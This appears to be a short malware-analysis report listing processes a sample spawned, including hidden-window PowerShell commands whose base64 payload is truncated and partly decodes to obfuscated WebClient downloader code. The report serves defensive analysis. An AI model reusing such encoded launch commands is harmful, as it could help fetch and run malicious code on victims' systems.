Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAFgAQgBvAFoAMQB4AD0AKAAnAFYAQwBBAEQAQQBBACcAKwAnAFUAJwApADsAJABPAF8AbwBjAEEAVQBCAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1282297.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAFgAQgBvAFoAMQB4AD0AKAAnAFYAQwBBAEQAQQBBACcAKwAnAFUAJwApADsAJABPAF8AbwBjAEEAVQBCAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...' (with a hidden window)